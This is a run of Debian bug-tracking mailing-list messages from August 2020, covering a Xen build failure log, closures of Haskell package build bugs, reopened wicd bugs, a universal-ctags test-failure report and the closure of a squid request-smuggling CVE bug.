-fdebug-prefix-map=/build/xen-4.11.4+24-gddaaccbbab=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -Werror -I. 
-include /build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/config.h 
-I./include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/evtchn/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libxc/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/toollog/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/foreignmemory/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/devicemodel/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-D__XEN_TOOLS__ 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/toolcore/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-DXEN_LIB_STORED="\"/var/lib/xenstored\"" 
-DXEN_RUN_STORED="\"/var/run/xenstored\""  
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/gnttab/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include  -c -o 
talloc.o talloc.c 
gcc xs_tdb_dump.o utils.o tdb.o talloc.o-Wl,-z,relro -Wl,-z,now  -o 
xs_tdb_dump 
/usr/bin/ld: utils.o:./tools/xenstore/utils.h:27: multiple definition of 
`xprintf'; xs_tdb_dump.o:./tools/xenstore/utils.h:27: first defined here
collect2: error: ld returned 1 exit status
make[6]: *** [Makefile:97: xs_tdb_dump] Error 1
make[6]: Leaving directory '/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore'
make[5]: *** [/build/xen-4.11.4+24-gddaaccbbab/tools/../tools/Rules.mk:253: 
subdir-install-xenstore] Error 2
make[5]: Leaving directory '/build/xen-4.11.4+24-gddaaccbbab/tools'
make[4]: *** [/build/xen-4.11.4+24-gddaaccbbab/tools/../tools/Rules.mk:248: 
subdirs-install] Error 2
make[4]: Leaving directory '/build/xen-4.11.4+24-gddaaccbbab/tools'
make[3]: *** [Makefile:74: install] Error 2
make[3]: Leaving directory '/build/xen-4.11.4+24-gddaaccbbab/tools'
make[2]: *** [Makefile:127: install-tools] Error 2
make[2]: Leaving directory '/build/xen-4.11.4+24-gddaaccbbab'
make[1]: *** [debian/rules:202: override_dh_auto_build] Error 2
make[1]: Leaving directory '/build/xen-4.11.4+24-gddaaccbbab'
make: *** [debian/rules:150: build] Error 2
dpkg-buildpackage: error: debian/rules build subprocess returned exit status 2
I: 

Bug#968729: marked as done (haskell-gi-pango FTBFS parse error on input ‘HarfBuzz.FeatureT.feature_t’)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 16:50:15 +
with message-id 
and subject line Bug#968729: fixed in haskell-gi-pango 1.0.23-1
has caused the Debian Bug report #968729,
regarding haskell-gi-pango FTBFS parse error on input 
‘HarfBuzz.FeatureT.feature_t’
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968729: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968729
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---

Source: haskell-gi-pango
Version: 1.0.22-1
Severity: serious
Tags: ftbfs

The most recent binnmus of haskell-gi-pango in sid failed with



GI/Pango/Objects/Font.hs:670:9: error:
parse error on input ‘HarfBuzz.FeatureT.feature_t’
|
670 | Ptr HarfBuzz.FeatureT.feature_t ->  -- features : TCArray False (-1) 2 (TInterface 
(Name {namespace = "HarfBuzz", name = "feature_t"}))
| ^^^
make: *** [/usr/share/cdbs/1/class/hlibrary.mk:147: build-ghc-stamp] Error 1
dpkg-buildpackage: error: debian/rules build-arch subprocess returned exit 
status 2




I also saw the same error in raspbian bullseye-staging and on the reproducible 
builds tests for bullseye.
--- End Message ---
--- Begin Message ---
Source: haskell-gi-pango
Source-Version: 1.0.23-1
Done: Ilias Tsitsimpis 

We believe that the bug you reported is fixed in the latest version of
haskell-gi-pango, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ilias Tsitsimpis  (supplier of updated haskell-gi-pango 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Sun, 23 Aug 2020 12:09:37 +0300
Source: haskell-gi-pango
Architecture: source
Version: 1.0.23-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Haskell Group 

Changed-By: Ilias Tsitsimpis 
Closes: 968729
Changes:
 haskell-gi-pango (1.0.23-1) unstable; urgency=medium
 .
   * New upstream release (Closes: #968729)
Checksums-Sha1:
 2c152d30168934b692297c8864ca8583ebe6a804 2801 haskell-gi-pango_1.0.23-1.dsc
 1792ca2c5c609ed2d9defd6e4a5ed43eeb4516c8 12695 
haskell-gi-pango_1.0.23.orig.tar.gz
 daf0970c3e5c8bd469bb22d5222054f4da49d1ef 1768 
haskell-gi-pango_1.0.23-1.debian.tar.xz
 43bdff967a1a10efb3bdca6b8fc04e3363e64685 5572 
haskell-gi-pango_1.0.23-1_source.buildinfo
Checksums-Sha256:
 2e44b9a18d09d1ace95d89bf65493fffd39dd6db07b62750edd3bdde3eb9 2801 
haskell-gi-pango_1.0.23-1.dsc
 89de8d4cf0911e471685ba9a1a0a72033748aaefa0e6f14ac0bf37fced40f7a2 12695 
haskell-gi-pango_1.0.23.orig.tar.gz
 b60d10e64a2c559e617a505d3102f004b67cc5241e7123e685cf93ef52eee0b5 1768 
haskell-gi-pango_1.0.23-1.debian.tar.xz
 2f889bd4a8e5406716738ea20d7d6638fcc4c5b94373fbcefcc01a61b347cce0 5572 
haskell-gi-pango_1.0.23-1_source.buildinfo
Files:
 46da8e3bedacbf5ec9960c912db6d7b5 2801 haskell optional 
haskell-gi-pango_1.0.23-1.dsc
 75234b5260f70da43b1f250ffaa4e383 12695 haskell optional 
haskell-gi-pango_1.0.23.orig.tar.gz
 b7624afaa0fd09bf5fc3792c71721ca1 1768 haskell optional 
haskell-gi-pango_1.0.23-1.debian.tar.xz
 97079d879cf45fcfd6077f73ef38d105 5572 haskell optional 
haskell-gi-pango_1.0.23-1_source.buildinfo

-BEGIN PGP SIGNATURE-

iQJIBAEBCgAyFiEEJ9c8pfW11+AaUTb116hngMxkQDwFAl9D7foUHGlsaWFzdHNp
QGRlYmlhbi5vcmcACgkQ16hngMxkQDzSiA//Q+wVL9pOwOjbFCEBmCviFRtBG4iu
jSP16J306YbRz3IvLIGFo1pWI8kckrzxePLOAgxTAwHq5CAFkrUWMVRXTi73ZWCR
qUPFADjpMHpvGKRpDXwmXpmx391sPajT5zn4NHbuPNe0BEuBYiyQv28lE/jXs1P9
iAl7A8p5YhLBJA33zxK7LlUuu2rABBvrKA3ouON160JO26yebODcSAbiVD2CGxdh
H2vGDfDzFOZaELEVSrFUstpUNViMvJkpc4ac6DiEvK+cNGQbh/8+Mq6W0iJ8QB7j
FWoe16EkVG7kqAJ9pECwsoNzasW5ad35R9o/FqmbRH03E314xCCcdIGz/WCrRbV/
/Pm94EaC+KxJsjyNMWfOP+7fLQJSfEk1xF/09wSTMN5EUAcD87o09OmQsDsVKmGk
IA7Mcc2t+O+W4IcpT6NyTx+MMkGlROyyI7UyGlwyHvzLBtndWDUC80VSHaf6Yl6n
fspdMB7q/JL25nSYGqiZjs8RX4P1InvqOippMly3rcZqbrhou09iVYNU9wqL1mmr
pvT2KV8bfGj3qrwdZ3zRQclGiz0UtaBmJH9FuU62x/Jg++Iaj65q5MfK2tJFJcHW
hxHjhkAYR335yk5xGqZGYQWqd9GkZmG4RrGO9wjQ0muDmteykmxHj0ThJivASI9m
QwOyAm8ahBc/tTw=
=kzQ0
-END PGP SIGNATURE End Message ---


Bug#968902: marked as done (gitit: libghc-hoauth2-dev (< 1.12) but 1.14.0-1 is to be installed)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 16:48:36 +
with message-id 
and subject line Bug#968902: fixed in gitit 0.13.0.0+dfsg-2
has caused the Debian Bug report #968902,
regarding gitit: libghc-hoauth2-dev (< 1.12) but 1.14.0-1 is to be installed
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968902: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968902
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: gitit
Version: 0.13.0.0+dfsg-1
Severity: serious
Tags: ftbfs

The following packages have unmet dependencies:
 builddeps:gitit : Depends: libghc-hoauth2-dev (< 1.12) but 1.14.0-1 is to be 
installed
--- End Message ---
--- Begin Message ---
Source: gitit
Source-Version: 0.13.0.0+dfsg-2
Done: Ilias Tsitsimpis 

We believe that the bug you reported is fixed in the latest version of
gitit, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ilias Tsitsimpis  (supplier of updated gitit package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Sun, 23 Aug 2020 16:45:09 +0300
Source: gitit
Architecture: source
Version: 0.13.0.0+dfsg-2
Distribution: unstable
Urgency: medium
Maintainer: Debian Haskell Group 

Changed-By: Ilias Tsitsimpis 
Closes: 968902
Changes:
 gitit (0.13.0.0+dfsg-2) unstable; urgency=medium
 .
   * Patch for newer dependencies (Closes: #968902)
Checksums-Sha1:
 e5fc31e14393f864dd7821dbd25e4092ebdfb7c0 6127 gitit_0.13.0.0+dfsg-2.dsc
 b23fa52c831e69c67f26cb35ad7a7be38dd78d14 10996 
gitit_0.13.0.0+dfsg-2.debian.tar.xz
 267decc96c32cb741c1fea9c854e63f5302c46aa 5738 
gitit_0.13.0.0+dfsg-2_source.buildinfo
Checksums-Sha256:
 9cd68d77ec4f6a320414348eb37703fb186e822c0b9b77294fb0bac580075a1e 6127 
gitit_0.13.0.0+dfsg-2.dsc
 31192baa695461779943c2a959f645eb0eaf57b391908e91a1eff97ff84f64bb 10996 
gitit_0.13.0.0+dfsg-2.debian.tar.xz
 f47a8f34cd13437807992563c33483c58b9992e8d6c7ef0eabd9876704e38ccd 5738 
gitit_0.13.0.0+dfsg-2_source.buildinfo
Files:
 f7d60b5a4fb867e84b905335576b8aaa 6127 haskell optional 
gitit_0.13.0.0+dfsg-2.dsc
 86274431684428f33d960072dddb545c 10996 haskell optional 
gitit_0.13.0.0+dfsg-2.debian.tar.xz
 fc3e6259c4525677ea5eefe99b690503 5738 haskell optional 
gitit_0.13.0.0+dfsg-2_source.buildinfo

-BEGIN PGP SIGNATURE-

iQJIBAEBCgAyFiEEJ9c8pfW11+AaUTb116hngMxkQDwFAl9D7ZMUHGlsaWFzdHNp
QGRlYmlhbi5vcmcACgkQ16hngMxkQDyrChAAhj05B/MJxrF2rW/bKDHwXYmFQOzo
/xShmgp08QsUdv5D3KqICaP/vzpqMcE+hzy1Ag5llQhgAJ7SFcIlARszHZcXWUNo
opTR2C1NjTpOAgjhbfbYCWB88p8LLTw9Baq4CvZ4axtypMiTQvcKA0USbGeTxxaz
tKf8hppXmz54GAvdCidP6bbXfvHhs2S4LhE5Ob7+OS5wb3ZhreAr/ysUlfjENA0p
17+Ee3KgQC9HsLMjon98WBanO9xgGmDWOskkRwbl3q8iY4m+EnAgw58WXmrGpboa
1XQa80N5giF2GK6z7MURqnqhMoO23mZzf7ooXaPknf/7WW/fZP2Tu+wqgjIx3F8x
qR4riq7UQF2cB6o1ioJ+ijG7toE1lEGOhafl2AlvlLF9Tr3LigYtL7ObcL9N317S
mTg86OjSLWT0koppGPnwkMnpGrkMYlzOae0ss3VMoZFZ6YAos+eodGwUlflQNGpt
cJ9AOXgdde9QM+XH5r3JjoCxUNenK8hTW0nxWFO7LkZfuTUbJAzpT9ynNVTpJZHZ
n4hkGzF7o7YkoQMMIJOjOHG9eWRQ3Pb5u0PPQGcpLBVa1TM5iEv3OAguxLAqogq3
EGttTixyh8ws9kHMX6rbFQaF/mi9xmestZHYc8nfp7eKw3XzJAkO4+kBWl6TE9iL
pk5iR/UNaElOzQM=
=D2W6
-END PGP SIGNATURE End Message ---


Bug#968901: marked as done (haskell-hakyll FTBFS: Encountered missing or private dependencies: file-embed >=0.0.10.1 && <0.0.12)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 16:50:33 +
with message-id 
and subject line Bug#968901: fixed in haskell-hakyll 4.13.4.0-2
has caused the Debian Bug report #968901,
regarding haskell-hakyll FTBFS: Encountered missing or private dependencies: 
file-embed >=0.0.10.1 && <0.0.12
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968901: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968901
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: haskell-hakyll
Version: 4.13.4.0-1
Severity: serious
Tags: ftbfs

https://buildd.debian.org/status/package.php?p=haskell-hakyll=sid

...
hlibrary.setup: Encountered missing or private dependencies:
file-embed >=0.0.10.1 && <0.0.12

make: *** [/usr/share/cdbs/1/class/hlibrary.mk:142: configure-ghc-stamp] Error 1
--- End Message ---
--- Begin Message ---
Source: haskell-hakyll
Source-Version: 4.13.4.0-2
Done: Ilias Tsitsimpis 

We believe that the bug you reported is fixed in the latest version of
haskell-hakyll, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ilias Tsitsimpis  (supplier of updated haskell-hakyll 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Sun, 23 Aug 2020 16:41:38 +0300
Source: haskell-hakyll
Architecture: source
Version: 4.13.4.0-2
Distribution: unstable
Urgency: medium
Maintainer: Debian Haskell Group 

Changed-By: Ilias Tsitsimpis 
Closes: 968901
Changes:
 haskell-hakyll (4.13.4.0-2) unstable; urgency=medium
 .
   * Patch for newer dependencies (Closes: #968901)
Checksums-Sha1:
 4c8a3a6ddae3bf29fab0e7428ac53e631d72ea76 5862 haskell-hakyll_4.13.4.0-2.dsc
 805fae76bbc0e09a167da2a304abdb098b801935 5280 
haskell-hakyll_4.13.4.0-2.debian.tar.xz
 3ae082c23365d63ba539dbd142ee1821238f9c38 5909 
haskell-hakyll_4.13.4.0-2_source.buildinfo
Checksums-Sha256:
 598262ff5c46d799d08d9c58ebe63cf819c712eeb2019e5a36266e89977f 5862 
haskell-hakyll_4.13.4.0-2.dsc
 b498a0a823c3b51cc329e0cd69638513f95e5732c9c1249dbb8118f1db1cbe1a 5280 
haskell-hakyll_4.13.4.0-2.debian.tar.xz
 359c0dbb125b214a5c2cb9e533e8425644768615331b4f86199e371c2aa8f49b 5909 
haskell-hakyll_4.13.4.0-2_source.buildinfo
Files:
 731fb53d749dc04cbbd5eb033c2b115e 5862 haskell optional 
haskell-hakyll_4.13.4.0-2.dsc
 5967880f02d638c1ffb8e84d1279df0d 5280 haskell optional 
haskell-hakyll_4.13.4.0-2.debian.tar.xz
 476d20cd404c3939a93267d9fcfc80ac 5909 haskell optional 
haskell-hakyll_4.13.4.0-2_source.buildinfo

-BEGIN PGP SIGNATURE-

iQJIBAEBCgAyFiEEJ9c8pfW11+AaUTb116hngMxkQDwFAl9D7hAUHGlsaWFzdHNp
QGRlYmlhbi5vcmcACgkQ16hngMxkQDw4xw//aJoIygW9GbrZArIdzZ7wmfWjVbDv
cABMmKh5OUG4lq2bajLJFtLqRV8iILI/MSq1R2UtYugn9xzadJU9Ydyvzy1jAvae
N+BgoikKn8rK9oyv4uM2HELIb6LVSYvUoqbY3z8YsMoBEIHl6kvMtmmIuR2kgX3o
I5hQqMtSkLhBz1WfxfmlCU/Gs9LKDp/8LxJXZyXoEfBnKgp2fRxsi7OTnE1jdexN
vxEEFdvwPxPYaiRJT6y9Xjnv448m92Ny3etWCX0B5RJePsZu2JfkBkWDgQ8voBm/
Rc850TB/kGm3WJKhGkFBHWw1t8q0MmPshHMw/mSXe3u5MrSKptb5uBz4ovC/7ddM
p8CKYDNokmfyzO9oZaLGHT/+Td6pXHkAmxx3m53hOAVYw75i2iRjZVb4UdFSyUG/
9KeJ8WtxN2Me3N/msPSFnLjbJWuZYzc8RsWywqlDBIotWI28ANjYV/k7bKNL0xMG
c6xOxw2mEgNQD9qJRfddnVI216ARRUMiPoGWDNzbWT6FhSqPV6OHmeUFKefeZN+1
6pWEeHI7MWOMO+ckOA/1coLCISyC2DBPmLjjatf2avKuCDiw/h7xPQZsnAYGzWPa
3UGpaNulMbS0Fxvo6dUWjD1gxK21DRXIlqghWyulS1S0rvrhNKiiHl95/ewqMGqO
zca5CVZZsVPtqq8=
=mt30
-END PGP SIGNATURE End Message ---


Processed (with 1 error): limit source to wicd, reopening 964450, reopening 964011, reopening 956159, reopening 959476 ...

2020-08-24 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

> # Reopen (hopefully) all bug reports which were unexdpectedly closed due to 
> #968033 which are very likely still valid against src:wicd in Debian 
> Experiemtnal
> limit source wicd
Limiting to bugs with field 'source' containing at least one of 'wicd'
Limit currently set to 'source':'wicd'

> reopen 964450
Bug #964450 {Done: Debian FTP Masters } 
[wicd-daemon] wicd-daemon: "Forced disconnect on" though I did not disconnect
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 964011
Bug #964011 {Done: Debian FTP Masters } 
[wicd-daemon] wicd-daemon: should be ordered After=network-pre.target
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 956159
Bug #956159 {Done: Debian FTP Masters } 
[wicd-gtk] Package depends on python-glade2 python-gtk2, which are no longer in 
sid
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 959476
Bug #959476 {Done: Debian FTP Masters } 
[wicd-daemon] wicd-daemon: spams the logs with "Throttling autoreconnect" 
messages
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 951125
Bug #951125 {Done: Debian FTP Masters } 
[python3-wicd] python3-wicd: No way to get the IPv6
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 951123
Bug #951123 {Done: Debian FTP Masters } 
[python3-wicd] python3-wicd: Unable to get the ssid (external backend)
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 951121
Bug #951121 {Done: Debian FTP Masters } 
[python3-wicd] python3-wicd: Unable to load ioctl backend (Python 2/3 syntax 
issue)
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 946380
Bug #946380 {Done: Debian FTP Masters } 
[wicd-gtk] wicd-gtk does not find gtk modules
Bug #947589 {Done: Debian FTP Masters } 
[wicd-gtk] wicd-gtk: [experimental] wicd-gtk probably broken: no GTK 
dependency, still uses 'import gtk'
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 947589
Bug #947589 [wicd-gtk] wicd-gtk: [experimental] wicd-gtk probably broken: no 
GTK dependency, still uses 'import gtk'
Bug #946380 [wicd-gtk] wicd-gtk does not find gtk modules
Bug 947589 is not marked as done; doing nothing.
> reopen 949300
Bug #949300 {Done: Debian FTP Masters } 
[wicd-gtk] wicd-gtk: does not permit passwordless private keys when using 
EAP-TLS
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 935661
Bug #935661 {Done: Debian FTP Masters } 
[wicd-gtk] wicd-gtk: Recommends obsolete kde-runtime
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 932094
Bug #932094 {Done: Debian FTP Masters } 
[wicd-daemon] wicd-daemon: some log messages do not appear correctly and are 
mixed up with other log messages
'reopen' may be inappropriate when a bug has been closed with a version;
all fixed versions will be cleared, and you may need to re-add them.
Bug reopened
No longer marked as fixed in versions 1.7.4+tb2-6+rm.
> reopen 943933
Bug #943933 {Done: Debian FTP Masters } [wicd] 
wicd: After update/upgrade a new type of window appeared in my system tray 
concerning my wifi connections. Although, my ifi worked ok, the new gui did not 
appear the names of wifi networks. After some searching I found out that the 
names of my devices (wifi and ethernet) changed. I spend to much time searching 
for this. So I add the name under the wireless interface tab and got up again 
my 

Bug#956349: marked as done (universal-ctags FTBFS on 32bit: test failures)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 18:13:29 +0200
with message-id <20200824161329.GA633404@sokka.flat11.house>
and subject line Re: Bug#956349: universal-ctags FTBFS on 32bit: test failures
has caused the Debian Bug report #956349,
regarding universal-ctags FTBFS on 32bit: test failures
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
956349: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=956349
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: universal-ctags
Version: 0+git20191013-1
Severity: serious
Tags: ftbfs
Control: block 953699 by -1

https://buildd.debian.org/status/package.php?p=universal-ctags

...
Category: parser-varlink.r

Testing varlink-enum as Varlink failed 
(unexpected exit status: 134)
Shrinking ./Units/parser-varlink.r/varlink-enum.d/input.varlink as Varlink
[0729]...failed(134)
[0  0]...ok(0)
[0729]...failed(134)
[0365]...failed(134)
[0183]...failed(134)
[0 92]...ok(0)
[0137]...failed(134)
[0115]...ok(0)
[0126]...failed(134)
[0121]...failed(134)
[0119]...ok(0)
[0120]...failed(134)
[0120]...failed(134)
[60   120]...ok(0)
[30   120]...ok(0)
[15   120]...ok(0)
[8120]...ok(0)
[5120]...ok(0)
[4120]...ok(0)
[3120]...ok(0)
[2120]...ok(0)
[1120]...ok(0)
Minimal badinput: 
/<>/Units/parser-varlink.r/varlink-enum.d/SHRINK-Varlink.tmp

# Taken from https://github.com/varlink/varlink.github.io/pull/12

interface org.example.complex

type Enum (enum, b, c)
Testing varlink-type-method-error as Varlinkfailed 
(unexpected exit status: 134)
Shrinking ./Units/parser-varlink.r/varlink-type-method-error.d/input.varlink as 
Varlink
[0565]...failed(134)
[0  0]...ok(0)
[0565]...failed(134)
[0283]...ok(0)
[0424]...failed(134)
[0354]...failed(134)
[0319]...failed(134)
[0302]...failed(134)
[0294]...failed(134)
[0290]...failed(134)
[0288]...failed(134)
[0287]...failed(134)
[0286]...failed(134)
[0285]...failed(134)
[0284]...failed(134)
[0284]...failed(134)
[142  284]...ok(0)
[71   284]...ok(0)
[36   284]...ok(0)
[19   284]...ok(0)
[11   284]...ok(0)
[7284]...ok(0)
[5284]...ok(0)
[4284]...ok(0)
[3284]...ok(0)
[2284]...ok(0)
[1284]...ok(0)
Minimal badinput: 
/<>/Units/parser-varlink.r/varlink-type-method-error.d/SHRINK-Varlink.tmp

# Taken from 
https://github.com/varlink/rust/blob/master/examples/more/src/org.example.more.varlink

# Example Varlink service
interface org.example.more

# Enum, returning either start, progress or end
# progress: [0-100]
type State (
  start: ?bool,
  progress: ?int,
  end: ?bool
)
...
Summary (see CMDLINE.tmp to reproduce without test harness)

  #passed:1009
  #FIXED: 2
parser-puppetManifest.r/puppet-tag
parser-puppetManifest.r/puppet-tagged
  #FAILED (broken args.ctags?):   0
  #FAILED (unexpected-exit-status):   2
parser-varlink.r/varlink-enum
parser-varlink.r/varlink-type-method-error
  #FAILED (unexpected-output):0
  #TIMED-OUT (10s)0
  #skipped (features):2
simple-ctags-aspell
parser-ant.r/regex-based
  #skipped (languages):   0
  #known-bugs:20
parser-autoconf.r/nested-block.ac
parser-c.r/attr-attached-to-array-failed
parser-c.r/extern_variable.h
parser-cxx.r/cxx-keywords-as-c-identifiers
parser-cxx.r/cxx-keywords-as-c-identifiers
parser-cxx.r/namespace-and-scope
parser-cxx.r/templates4
parser-cxx.r/variables-prototypes.cpp
parser-elixir.r/elixir-exceptions
parser-itcl.r/fq-with-namespace
parser-java.r/anonymous-class
parser-java.r/bug1777344.java
parser-javascript.r/js-scope-resolution
parser-m4.r/m4-quotestring
parser-perl.r/curly-bracket
parser-puppetManifest.r/puppet-virtualresources
parser-python.r/newlines-cr

Bug#968934: marked as done (squid: CVE-2020-15810: SQUID-2020:10 HTTP(S) Request Smuggling)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 15:49:31 +
with message-id 
and subject line Bug#968934: fixed in squid 4.13-1
has caused the Debian Bug report #968934,
regarding squid: CVE-2020-15810: SQUID-2020:10 HTTP(S) Request Smuggling
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968934: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968934
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: squid
Version: 4.12-1
Severity: grave
Tags: security upstream
Justification: user security hole
X-Debbugs-Cc: car...@debian.org, Debian Security Team 

Hi,

The following vulnerability was published for squid.

CVE-2020-15810[0]:
| SQUID-2020:10 HTTP(S) Request Smuggling

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2020-15810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15810
[1] https://github.com/squid-cache/squid/security/advisories/GHSA-3365-q9qx-f98m
[2] http://www.squid-cache.org/Versions/v4/changesets/SQUID-2020_10.patch

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore
--- End Message ---
--- Begin Message ---
Source: squid
Source-Version: 4.13-1
Done: Luigi Gangitano 

We believe that the bug you reported is fixed in the latest version of
squid, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luigi Gangitano  (supplier of updated squid package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Mon, 24 Aug 2020 17:27:54 +0200
Source: squid
Architecture: source
Version: 4.13-1
Distribution: unstable
Urgency: high
Maintainer: Luigi Gangitano 
Changed-By: Luigi Gangitano 
Closes: 968101 968932 968933 968934
Changes:
 squid (4.13-1) unstable; urgency=high
 .
   [ Amos Jeffries  ]
   * New Upstream Release
 - Fixes security issue SQUID-2020:8 (CVE-2020-15811) (Closes: #968932)
 - Fixes security issue SQUID-2020:9 (Closes: #968933)
